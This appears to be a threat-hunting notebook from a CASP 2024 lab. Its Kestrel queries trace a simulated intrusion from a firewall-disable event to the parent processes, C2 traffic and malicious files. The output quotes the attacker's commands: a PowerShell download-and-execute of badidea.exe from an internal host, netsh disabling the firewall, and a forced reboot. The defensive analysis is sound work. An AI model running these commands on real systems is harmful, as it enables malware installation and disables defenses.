# CASP 2024: Hunt an Entire Threat from an Indicator of Behavior

Let's start from T1562.004 *Impair Defenses: Disable or Modify System Firewall*

On the [MITRE page of the TTP](https://attack.mitre.org/techniques/T1562/004/), there is a *Detection* section listing different ways to detect it. The first is using command execution. Let's write an IoB for this *Disable or Modify System Firewall* behavior.

In [1]:
# IoB: T1562.004
disablefw = GET process FROM stixshifter://casp2024-edr
            WHERE (name = 'ufw' AND command_line LIKE '%disable%')
               OR (name = 'sudo' AND command_line LIKE '%ufw disable%')
               OR (name IN ('netsh', 'netsh.exe') AND command_line LIKE '%advfirewall%off%')
            LAST 90 DAYS

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,file*,ipv4-addr*,ipv6-addr*,mac-addr*,process*,software*,user-account*,x-oca-asset*,x-oca-event*
disablefw,process,1,3,3,5,3,3,3,4,5,3,3,3


In [2]:
# we get something, what is it?

DISP disablefw ATTR pid, name, command_line

host = FIND x-oca-asset LINKED disablefw LAST 90 DAYS
DISP host

pid 
 name 
 command_line 
 
 
 
 
 12232 
 netsh.exe 
 netsh advfirewall set allprofiles state off 
 
 
 
 
 
 
 hostname 
 name 
 device_id 
 architecture 
 id 
 
 
 
 
 win10-casp-ws1 
 win10-casp-ws1 
 dd94cc1a-b670-4c10-82f3-65fd39929711 
 x86_64 
 x-oca-asset--9b61fb8d-1146-5dac-8c2e-2417264f3086 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 process* 
 software* 
 user-account* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 host 
 x-oca-asset 
 1 
 3 
 3 
 5 
 3 
 3 
 3 
 5 
 5 
 3 
 2 
 3 
 
 
 *Number of related records cached.

In [3]:
# ancestry up to 5 levels

pproc = FIND process CREATED disablefw LAST 90 DAYS
DISP pproc ATTR pid, name, command_line

p2proc = FIND process CREATED pproc LAST 90 DAYS
DISP p2proc ATTR pid, name, command_line

p3proc = FIND process CREATED p2proc LAST 90 DAYS
DISP p3proc ATTR pid, name, command_line

p4proc = FIND process CREATED p3proc LAST 90 DAYS
DISP p4proc ATTR pid, name, command_line

p5proc = FIND process CREATED p4proc LAST 90 DAYS
DISP p5proc ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 5268 
 cmd.exe 
 cmd.exe 
 
 
 
 
 
 
 pid 
 name 
 command_line 
 
 
 
 
 3096 
 badidea.exe 
 "C:\Users\Public\badidea.exe" 
 
 
 
 
 
 
 pid 
 name 
 command_line 
 
 
 
 
 4236 
 powershell.exe 
 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \$server=\"http://172.16.1.14:80/badidea.exe\";\$wc=New-Object System.Net.WebClient;\$data=\$wc.DownloadData(\$server);[io.file]::WriteAllBytes(\"C:\Users\Public\badidea.exe\",\$data) | Out-Null;Start-Process -FilePath C:\Users\Public\badidea.exe -WindowStyle hidden;echo whoami 
 
 
 
 
 
 
 pid 
 name 
 command_line 
 
 
 
 
 11084 
 WINWORD.EXE 
 "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Administrator\Desktop\More Malware.docx" 
 
 
 
 Block Executed in 7 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 domain-name* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 software* 
 user-account* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 pproc 
 process 
 1 
 6 
 20 
 3 
 24 
 17 
 15 
 15 
 3 
 23 
 23 
 15 
 15 
 15 
 
 
 p2proc 
 process 
 1 
 9 
 24 
 4 
 27 
 16 
 17 
 17 
 4 
 26 
 25 
 17 
 17 
 17 
 
 
 p3proc 
 process 
 1 
 6 
 22 
 4 
 23 
 13 
 15 
 15 
 4 
 22 
 21 
 15 
 15 
 15 
 
 
 p4proc 
 process 
 1 
 3 
 10 
 1 
 11 
 3 
 7 
 7 
 1 
 10 
 10 
 7 
 7 
 7 
 
 
 p5proc 
 process 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 0 
 
 
 *Number of related records cached.

In [4]:
allproc = disablefw + pproc + p2proc + p3proc

VARIABLE,TYPE,#(ENTITIES),#(RECORDS),directory*,domain-name*,file*,ipv4-addr*,ipv6-addr*,mac-addr*,network-traffic*,process*,software*,user-account*,x-oca-asset*,x-oca-event*
allproc,process,4,28,0,0,0,0,0,0,0,0,0,0,0,0


In [5]:
# Let's track all activities the attacker did

child_proc = FIND process CREATED BY allproc LAST 90 DAYS
DISP child_proc ATTR pid, name, command_line

pid 
 name 
 command_line 
 
 
 
 
 2364 
 conhost.exe 
 \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 
 
 
 5268 
 cmd.exe 
 cmd.exe 
 
 
 13144 
 shutdown.exe 
 "C:\WINDOWS\system32\shutdown.exe" -r -f -t 00 
 
 
 11096 
 conhost.exe 
 \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 
 
 
 12232 
 netsh.exe 
 netsh advfirewall set allprofiles state off 
 
 
 5880 
 conhost.exe 
 \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 
 
 
 3096 
 badidea.exe 
 "C:\Users\Public\badidea.exe" 
 
 
 
 Block Executed in 2 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 domain-name* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 software* 
 user-account* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 child_proc 
 process 
 7 
 47 
 49 
 7 
 56 
 36 
 37 
 37 
 7 
 49 
 53 
 37 
 37 
 37 
 
 
 *Number of related records cached.

In [6]:
# Let's track all network activities the attacker did

nt = FIND network-traffic CREATED BY allproc LAST 90 DAYS
DISP nt ATTR src_ref.value, src_port, dst_ref.value, dst_port

src_ref.value 
 src_port 
 dst_ref.value 
 dst_port 
 
 
 
 
 192.168.1.103 
 63640 
 172.16.1.13 
 31337 
 
 
 192.168.1.103 
 64460 
 172.16.1.13 
 31337 
 
 
 192.168.1.103 
 64548 
 172.16.1.13 
 31337 
 
 
 192.168.1.103 
 63638 
 172.16.1.14 
 80 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 domain-name* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 software* 
 user-account* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 nt 
 network-traffic 
 4 
 7 
 41 
 7 
 44 
 29 
 30 
 30 
 3 
 44 
 41 
 30 
 30 
 30 
 
 
 *Number of related records cached.

In [7]:
# Can we find the traffic at the OPNSense/firewall to take further action, e.g., adding rule to block the IP

# Data Issue Found
# for some reason, the clock has 30 min diff between the host and the firewall
# so we need to add "LAST 90 DAYS" to override Kestrel's automatic time range generation

nt_fw = GET network-traffic FROM stixshifter://casp2024-netflow
        WHERE src_port = nt.src_port
        
c2_ip = FIND ipv4-addr ACCEPTED nt_fw
DISP c2_ip ATTR value

value 
 
 
 
 
 172.16.1.14 
 
 
 172.16.1.13 
 
 
 
 Block Executed in 4 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 domain-name* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 software* 
 user-account* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 nt_fw 
 network-traffic 
 3 
 33 
 0 
 0 
 0 
 450 
 0 
 0 
 147 
 150 
 0 
 0 
 0 
 150 
 
 
 c2_ip 
 ipv4-addr 
 2 
 157 
 41 
 7 
 44 
 477 
 30 
 30 
 157 
 194 
 41 
 30 
 30 
 180 
 
 
 *Number of related records cached.

In [8]:
# hunting for malicious files

fs = FIND file LINKED p2proc
DISP fs

name 
 id 
 hashes.'SHA-256' 
 hashes.MD5 
 parent_directory_ref.path 
 parent_directory_ref.id 
 
 
 
 
 badidea.exe 
 file--6a71f773-5872-5930-8d53-a096a154b28f 
 None 
 None 
 C:\Users\Public 
 directory--9cbb5121-7a48-5719-8f2f-170809992f9b 
 
 
 cmd.exe 
 file--c24c9d07-defe-5c0f-90d4-083ed0927fe5 
 265b69033cea7a9f8214a34cd9b17912909af46c7a47395dd7bb893a24507e59 
 cb6cd09f6a25744a8fa6e4b3e4d260c5 
 C:\Windows\System32 
 directory--0a58d0c1-59e6-5afd-8252-dcd3f13e5622 
 
 
 powershell.exe 
 file--0daceb39-1883-534b-b6ab-ebcafab74cfa 
 None 
 None 
 C:\Windows\System32\WindowsPowerShell\v1.0 
 directory--c18706ba-12ab-53b2-9524-6ef585f3127a 
 
 
 badidea.exe 
 file--4a881259-2e99-5755-b06c-d4cac5319b0a 
 c1d847e5eb645a3f516afe8f71e1555a96799ee2f76c211c5ae63f5ff14dad84 
 2922b4dad9307e46656ec1cf9822f815 
 C:\Users\Public 
 directory--9cbb5121-7a48-5719-8f2f-170809992f9b 
 
 
 conhost.exe 
 file--d606396d-965f-573c-8655-d80858601594 
 c43cf46192da061dd6169e55aac4d2d08a6c33c039a7dac0d88aa897661cbc87 
 7417006ac4f38dbe0efd36647c3ebae4 
 C:\Windows\System32 
 directory--0a58d0c1-59e6-5afd-8252-dcd3f13e5622 
 
 
 shutdown.exe 
 file--69aa4237-8e09-5842-bbba-456c3ad11bec 
 d4e68cc9cb1965d70134c68bd1a090e0afae5b8b3d8018c6b6564852ae7bf396 
 f2a4e18da72bb2c5b21076a5de382a20 
 C:\Windows\System32 
 directory--0a58d0c1-59e6-5afd-8252-dcd3f13e5622 
 
 
 
 Block Executed in 1 seconds 
 
 
 VARIABLE 
 TYPE 
 #(ENTITIES) 
 #(RECORDS) 
 directory* 
 domain-name* 
 file* 
 ipv4-addr* 
 ipv6-addr* 
 mac-addr* 
 network-traffic* 
 process* 
 software* 
 user-account* 
 x-oca-asset* 
 x-oca-event* 
 
 
 
 
 fs 
 file 
 6 
 35 
 46 
 7 
 45 
 33 
 34 
 34 
 7 
 51 
 48 
 34 
 34 
 34 
 
 
 *Number of related records cached.

## Summary

1. We go from the firewall disabling behaivor T1562.004 to hunt the entire threat:
  - What activities did the attack perform on the host
  - What files did the attacker uses on the host
  - What network traffic did the attacker generates on the gateway/firewall (corss-source hunt)

2. Further actions to take (another OpenC2 call):
  - Kill a process
  - Cut an existing network traffic on OPNSense
  - Block the C2 server IP on OPNSense
  - Retrieve malicious files on the host for malware analysis
  
3. Potential improvements on data:
  - ~Clock differs half an hour between the host (EDR source) and the gateway (netflow source)~
  - ~The execution/creation of `badidea.exe` is not recorded~
  - ~`badidea.exe` does not have hash recorded (looks like a sysmon issue)~
  - `STEALME.txt` is missing in the data and we could not reason about this impact
  - All 3 hosts have the same ID: `dd94cc1a-b670-4c10-82f3-65fd39929711`